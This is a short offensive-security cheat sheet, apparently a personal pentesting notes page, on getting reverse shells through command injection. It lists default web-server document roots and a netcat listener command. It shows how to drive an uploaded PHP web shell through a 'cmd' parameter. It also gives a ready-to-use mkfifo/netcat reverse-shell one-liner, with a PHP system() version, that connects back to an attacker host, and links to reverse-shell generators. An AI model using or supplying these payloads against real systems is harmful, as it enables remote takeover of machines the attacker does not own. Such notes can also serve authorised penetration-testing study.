search

Reverse Shells

hashtag
Command injection

To be able to execute the reverse shell we first need to be able to inject commands:

Command injectionchevron-right
chevron-rightDefault Webroot for common web servershashtag
Apache    /var/www/html/
Nginx     /usr/local/nginx/html/
IIS       C:\inetpub\wwwroot\
XAMPP     C:\xampp\htdocs\
chevron-rightAccessing the reverse shellhashtag
#Listening for the reverse shell with netcat
nc -lnvp Port

#Once the malicious shell script is passed to the victim:
 ##In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here

 ##Directly from the terminal
curl http://server_ip:port/shellScript.php?cmd=your_command_here

hashtag
Scripts

chevron-rightPHPhashtag
#Get netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackIP ListeningPort) >/tmp/f
 ##Adapted for PHP
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f"); ?>

hashtag
Online shell lists/generators

hashtag
Revshells

LogoOnline - Reverse Shell Generatorwww.revshells.comchevron-right
Revshells

hashtag
PayloadAllTheThings/Reverse

LogoPayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHubchevron-right
PayloadAllTheThings

Last updated